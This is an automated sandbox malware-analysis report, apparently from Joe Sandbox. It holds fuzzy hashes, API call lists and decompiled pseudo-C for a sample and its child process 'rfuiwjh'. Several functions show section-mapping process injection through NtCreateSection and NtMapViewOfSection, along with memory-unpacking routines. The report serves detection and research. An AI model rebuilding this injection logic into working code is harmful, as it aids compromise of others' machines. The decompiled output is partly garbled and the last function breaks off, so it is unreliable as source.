Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401749 Relevance: 3.0, APIs: 2, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA70 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 530
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNELBASE(00000000,022E09D4,?,?,?,?,?,?,00413246,000000FF), ref: 0040EC96
_memset.LIBCMT ref: 0040EE95
LoadLibraryA.KERNELBASE(0043D348,?,?,?,?,?,?,00413246,000000FF), ref: 0040F10D

Strings

L3@, xrefs: 0040EC06

Memory Dump Source

Source File: 00000000.00000002.568920654.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: AllocLibraryLoadLocal_memset
String ID: L3@
API String ID: 3001991562-74877206
Opcode ID: bd9014d15267a48505b4caba286d1cb78914e6118b25051498a9abb6c9eba890
Instruction ID: 8642481a01df23607ce85ee2231ddc15ad8b2bbf9e6295a8e4f19d84a88c1ac2
Opcode Fuzzy Hash: bd9014d15267a48505b4caba286d1cb78914e6118b25051498a9abb6c9eba890
Instruction Fuzzy Hash: C012D871644344AFE3209FA1DD4AF5B77A8FB88B01F10453EF749BA1E1DBB464408B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6F0 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(022D697C,022E09D4,00000040,?,?,0040F078,?,?,?,?,?,?,00413246,000000FF), ref: 0040E7C0

Memory Dump Source

Source File: 00000000.00000002.568920654.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a4d45899bb2d75addfdc849062d626ff1d25a05c3e4c2ac9797f45d58bb2ff26
Instruction ID: f01ecb459cbfb3dd0aa0bd1d4d090b7b8208c7bf3b78b88e987380e049611219
Opcode Fuzzy Hash: a4d45899bb2d75addfdc849062d626ff1d25a05c3e4c2ac9797f45d58bb2ff26
Instruction Fuzzy Hash: BB113370D96640CAE314CFE4F9487313BB6EB58700F20A42DD485DB6A4D7BD4594CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401932 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00401932(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				void* _t19;
				void* _t20;

				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, __eflags);
				_t14 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				_t10 = L00401467(_t19, _t20); // executed
				_t26 = _t10;
				if(_t10 != 0) {
					E00401558(_t14, _t10, _v8, _a16); // executed
				}
				 *_t14(0xffffffff, 0);
				_t12 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t26);
				return _t12;
			}

0x00401943
0x0040195b
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F

Uniqueness

Uniqueness Score: -1.00%

Function 0040193D Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E0040193D(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t14;
				void* _t16;
				intOrPtr* _t18;
				void* _t30;
				signed int _t38;

				_t26 = __edi;
				asm("in eax, 0x45");
				_t2 = __eax - 0x7a;
				 *_t2 =  *(__eax - 0x7a) | __ecx;
				_t38 =  *_t2;
				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(__edi, _t38);
				_t18 =  *((intOrPtr*)(_t30 + 8));
				Sleep(0x1388);
				_push(_t30 - 4);
				_push( *((intOrPtr*)(_t30 + 0x10)));
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t18); // executed
				_t14 = L00401467(__edi, __esi); // executed
				_t39 = _t14;
				if(_t14 != 0) {
					E00401558(_t18, _t14,  *((intOrPtr*)(_t30 - 4)),  *((intOrPtr*)(_t30 + 0x14))); // executed
				}
				 *_t18(0xffffffff, 0);
				_t16 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t26, _t39);
				return _t16;
			}

0x0040193d
0x00401940
0x00401942
0x00401942
0x00401942
0x00401943
0x0040195b
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 0040196C Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040196C(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t9;
				void* _t11;
				intOrPtr* _t13;
				void* _t23;

				_t19 = __edi;
				_pop(es);
				asm("sbb bh, [eax+ebp*2]");
				_push(0xc5);
				L004011F5(__edi, __eflags);
				_t13 =  *((intOrPtr*)(_t23 + 8));
				Sleep(0x1388);
				_push(_t23 - 4);
				_push( *((intOrPtr*)(_t23 + 0x10)));
				_push( *((intOrPtr*)(_t23 + 0xc)));
				_push(_t13); // executed
				_t9 = L00401467(__edi, __esi); // executed
				_t29 = _t9;
				if(_t9 != 0) {
					E00401558(_t13, _t9,  *((intOrPtr*)(_t23 - 4)),  *((intOrPtr*)(_t23 + 0x14))); // executed
				}
				 *_t13(0xffffffff, 0);
				_t11 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t29);
				return _t11;
			}

0x0040196c
0x0040196c
0x0040196d
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040FEA4 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040FECA

Part of subcall function 0040FCF6: __fltout2.LIBCMT ref: 0040FD21

__cftog_l.LIBCMT ref: 0040FEF0
__cftoe_l.LIBCMT ref: 0040FF22

Memory Dump Source

Source File: 00000000.00000002.568920654.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 21dec4cf196e8d3a75056bdaf36ad97ed8be340911ea432b545e5ad1cb732c00
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 00117E3300014EBBCF225E85DC01CEE3F22BB59354F188436FA1869971C73AC9B9AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004097A3 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004097D5

Part of subcall function 00409101: __getptd_noexit.LIBCMT ref: 00409104

__getptd.LIBCMT ref: 004097E3
__getptd.LIBCMT ref: 004097F1
__getptd.LIBCMT ref: 004097FC

Part of subcall function 004098C9: __getptd.LIBCMT ref: 004098D8
Part of subcall function 004098C9: __getptd.LIBCMT ref: 004098E6

Memory Dump Source

Source File: 00000000.00000002.568920654.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: __getptd$__getptd_noexit
String ID:
API String ID: 989085358-0
Opcode ID: 88ff4ae8ad139f6cf891c398988e30e45730a6c768ec8ce72122bb6a955ccad6
Instruction ID: a3a858591b394101024f9bae808b1775020d1581c8466258f4f8275c37b29c86
Opcode Fuzzy Hash: 88ff4ae8ad139f6cf891c398988e30e45730a6c768ec8ce72122bb6a955ccad6
Instruction Fuzzy Hash: 23110A71D00209EFDB00EFA5D845AAE7BB0FF04318F10846AF814AB292DB7D99159F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAD0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040AADC

Part of subcall function 00409101: __getptd_noexit.LIBCMT ref: 00409104

__getptd.LIBCMT ref: 0040AAF3
__lock.LIBCMT ref: 0040AB11
__updatetlocinfoEx_nolock.LIBCMT ref: 0040AB25

Memory Dump Source

Source File: 00000000.00000002.568920654.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: __getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 1314619503-0
Opcode ID: 07e8029e51f5a19f80c856b6c46ab3295c6cf05eb32ae71829c0fb4d131a8133
Instruction ID: a52b9318068f80dff3845aa1089be6ff0d2d17eda390060aa090471aa132d8b8
Opcode Fuzzy Hash: 07e8029e51f5a19f80c856b6c46ab3295c6cf05eb32ae71829c0fb4d131a8133
Instruction Fuzzy Hash: FEF06232B04710AAE721BB759806B5972A06B00728F11413FF5117B2D2CA7D6961DA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004098C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004098D8

Part of subcall function 00409101: __getptd_noexit.LIBCMT ref: 00409104

__getptd.LIBCMT ref: 004098E6

Strings

csm, xrefs: 004098F4

Memory Dump Source

Source File: 00000000.00000002.568920654.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: __getptd$__getptd_noexit
String ID: csm
API String ID: 989085358-1018135373
Opcode ID: 2bcf526534d84440a1d74fd0b089d06bbe8278e6a2fb0f241b80fc6935665840
Instruction ID: 589554cbe101abdec6479dd06ff32a3fe8de771eaf826da5da891be04775fa4a
Opcode Fuzzy Hash: 2bcf526534d84440a1d74fd0b089d06bbe8278e6a2fb0f241b80fc6935665840
Instruction Fuzzy Hash: 110178718062059BCF349FA1C4446AEB3B5AF10314F64843FE481BA7E2CB399D90CA18

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rfuiwjhPID: 6860, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	89.8%
Signature Coverage:	6.1%
Total number of Nodes:	98
Total number of Limit Nodes:	3

Executed Functions

Function 00401558 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401558(intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				struct _EXCEPTION_RECORD _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				intOrPtr _v56;
				long _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __edi;
				intOrPtr _t87;
				struct _EXCEPTION_RECORD _t90;
				intOrPtr _t91;
				struct _GUID _t97;
				struct _GUID _t99;
				long _t100;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t183;
				intOrPtr* _t184;
				HANDLE* _t185;
				HANDLE* _t186;
				intOrPtr _t199;
				void* _t200;
				intOrPtr* _t201;
				void* _t205;

				_push(0x387);
				_t201 = _t200 + 4;
				_push(0x83);
				L004011F5(_t175, _t205);
				_t127 = _a4;
				_t176 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t183 =  &_v100;
				 *_t183 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 =  &_v52;
					 *_t132 = _t90;
					 *(_t132 + 4) = _t176;
					_t184 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_push( &_v52);
					_push(_t184);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t176, _t176, 2) == 0) {
						_v12 = _t176;
						_t97 =  &_v84;
						 *(_t97 + 4) = _t176;
						 *_t97 = 0x5000;
						_t185 =  &_v88;
						if(NtCreateSection(_t185, 6, _t176, _t97, 4, 0x8000000, _t176) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t185, _v16, _t123, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
									_t199 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t199, 0x104);
									 *((intOrPtr*)(_t199 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t99 =  &_v84;
						 *(_t99 + 4) = _t176;
						 *_t99 = _a12 + 0x10000;
						_t186 =  &_v92;
						_t100 = NtCreateSection(_t186, 0xe, _t176, _t99, 0x40, 0x8000000, _t176);
						if (_t100 != 0) goto L67;
						 *_t100 =  *_t100 + _t100;
					}
				}
				_push(0x15a4);
				_t91 =  *_t201;
				_push(0x83);
				L004011F5(_t176, _t226);
				return _t91;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00401564 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401564(void* __eax, void* __edx, void* __esi) {
				intOrPtr _t89;
				struct _EXCEPTION_RECORD _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				PVOID* _t125;
				intOrPtr _t129;
				struct _EXCEPTION_RECORD* _t135;
				void* _t179;
				struct _EXCEPTION_RECORD _t180;
				struct _EXCEPTION_RECORD* _t190;
				intOrPtr* _t192;
				HANDLE* _t193;
				HANDLE* _t194;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t216;

				_t216 = __eax + 0x15a4b8;
				_push(0x387);
				_t211 = _t210 + 4;
				_push(0x83);
				L004011F5(_t179, _t216);
				_t129 =  *((intOrPtr*)(_t208 + 8));
				_t180 = 0;
				 *((intOrPtr*)(_t208 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t208 - 0x34)) =  *((intOrPtr*)(_t208 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t89;
				_t190 = _t208 - 0x60;
				 *_t190 = _t180;
				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t190);
				_t92 =  *_t190;
				if(_t92 != 0) {
					_t135 = _t208 - 0x30;
					 *_t135 = _t92;
					 *(_t135 + 4) = _t180;
					_t192 = _t208 - 0x28;
					 *((intOrPtr*)(_t129 + 0x10))(_t192, 0x18);
					 *_t192 = 0x18;
					_push(_t208 - 0x30);
					_push(_t192);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t180, _t180, 2) == 0) {
						 *(_t208 - 8) = _t180;
						_t99 = _t208 - 0x50;
						 *(_t99 + 4) = _t180;
						 *_t99 = 0x5000;
						_t193 = _t208 - 0x54;
						if(NtCreateSection(_t193, 6, _t180, _t99, 4, 0x8000000, _t180) == 0) {
							 *_t25 =  *(_t208 - 0x50);
							_t123 = _t208 - 0x44;
							 *_t123 = _t180;
							if(NtMapViewOfSection( *_t193, 0xffffffff, _t123, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
								_t125 = _t208 - 0x3c;
								 *_t125 = _t180;
								if(NtMapViewOfSection( *_t193,  *(_t208 - 0xc), _t125, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
									_t207 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t129 + 0x20))(_t180, _t207, 0x104);
									 *((intOrPtr*)(_t207 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t180;
						 *_t101 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t194 = _t208 - 0x58;
						_t102 = NtCreateSection(_t194, 0xe, _t180, _t101, 0x40, 0x8000000, _t180);
						if (_t102 != 0) goto L66;
						 *_t102 =  *_t102 + _t102;
					}
				}
				_push(0x15a4);
				_t93 =  *_t211;
				_push(0x83);
				L004011F5(_t180, _t237);
				return _t93;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401577 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00401577() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t210;

				asm("repe push 0x387");
				_push(0x387);
				_t205 = _t204 + 4;
				_push(0x83);
				L004011F5(_t175, _t210);
				_t126 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
